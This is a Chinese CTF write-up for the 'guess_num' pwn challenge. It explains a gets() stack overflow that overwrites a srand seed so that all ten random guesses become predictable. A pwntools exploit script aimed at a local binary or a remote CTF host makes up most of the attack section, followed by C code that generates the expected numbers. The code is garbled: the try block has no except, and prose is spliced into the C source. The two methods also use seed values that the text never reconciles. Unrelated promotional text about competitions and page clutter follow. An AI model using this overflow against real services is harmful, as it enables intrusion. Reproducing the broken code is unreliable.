guess_num的wp

guess_num

这题很有趣(
放Linux康康
在这里插入图片描述

好家伙保护直接加满了,这是个64位程序,放进ida64康康
在这里插入图片描述
这题关键在于gets和srand函数的作用
分析函数,srand是根据seed[0]随机生成数
这题要猜10次数字全对才能得到flag
接下来康康gets这个危险函数
在这里插入图片描述
思路是从v7下来把seed覆盖成为我们想要的值
在此之前,我们要写一个srand函数

from pwn import *
from ctypes import *
#引入c语言函数库
context(os = "linux" , arch = "amd64" , log_level = "debug")
content = 1

def srand():   
	#书写srand函数
	lib = cdll.LoadLibrary("libc.so.6")
	#链接动态函数库
	lib.srand(1)

	for i in range(10):
		number = str(lib.rand()%6 + 1)
		#生成数字
		peiqi.recvuntil("Please input your guess number:")
		peiqi.sendline(number)



def main():
	global peiqi
	try:
		if content == 1:
			peiqi = process("guess") 
		else:
			peiqi = remote("220.249.52.133",43180)
	
	payload = b"a" * (0x30-0x10)
	payload = payload + p64(1)

	peiqi.recvuntil("Your name:")
	peiqi.sendline(payload)

	srand()
	peiqi.interactive()

main()

这是方法一,本质是用Python写c语言代码,不过要用到动态链接库,还要引入函数库
由此可以用到方法二,直接编写c语言,运行后直接得到要猜的数字,然后一个个输进去
有点偷懒,不过不用Python写srand了,只用写一段C语言代码‘

方法二

#include <stdio.h>
#include <stdlib.h>
生成的结果如下
这里我们使用的是'a'来做随机数的种子,所以在获取flag的时候也要用a将种子覆盖掉。按照上面生成的
顺序输入获得flag
int main()
{
srand(0x61616161);
//函数srand需要的种子
for (int i = 0; i < 10; i++)
{
int b = rand() % 6 + 1;
printf("%d\n", b);
}
system("pause");
return(0);
}

运行结果
在这里插入图片描述

然后执行脚本
get flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
对于计算机专业的学生而言,参加各类比赛能够带来多方面的益处,具体包括但不限于以下几点: 技能提升: 参与比赛促使学生深入学习和掌握计算机领域的专业知识与技能,如编程语言、算法设计、软件工程、网络安全等。 比赛通常涉及实际问题的解决,有助于将理论知识应用于实践中,增强问题解决能力。 实践经验: 大多数比赛都要求参赛者设计并实现解决方案,这提供了宝贵的动手操作机会,有助于积累项目经验。 实践经验对于计算机专业的学生尤为重要,因为雇主往往更青睐有实际项目背景的候选人。 团队合作: 许多比赛鼓励团队协作,这有助于培养学生的团队精神、沟通技巧和领导能力。 团队合作还能促进学生之间的知识共享和思维碰撞,有助于形成更全面的解决方案。 职业发展: 获奖经历可以显著增强简历的吸引力,为求职或继续深造提供有力支持。 某些比赛可能直接与企业合作,提供实习、工作机会或奖学金,为学生的职业生涯打开更多门路。 网络拓展: 比赛是结识同行业人才的好机会,可以帮助学生建立行业联系,这对于未来的职业发展非常重要。 奖金与荣誉: 许多比赛提供奖金或奖品,这不仅能给予学生经济上的奖励,还能增强其成就感和自信心。 荣誉证书或奖状可以证明学生的成就,对个人品牌建设有积极作用。 创新与研究: 参加比赛可以激发学生的创新思维,推动科研项目的开展,有时甚至能促成学术论文的发表。 个人成长: 在准备和参加比赛的过程中,学生将面临压力与挑战,这有助于培养良好的心理素质和抗压能力。 自我挑战和克服困难的经历对个人成长有着深远的影响。 综上所述,参加计算机领域的比赛对于学生来说是一个全面发展的平台,不仅可以提升专业技能,还能增强团队协作、沟通、解决问题的能力,并为未来的职业生涯奠定坚实的基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值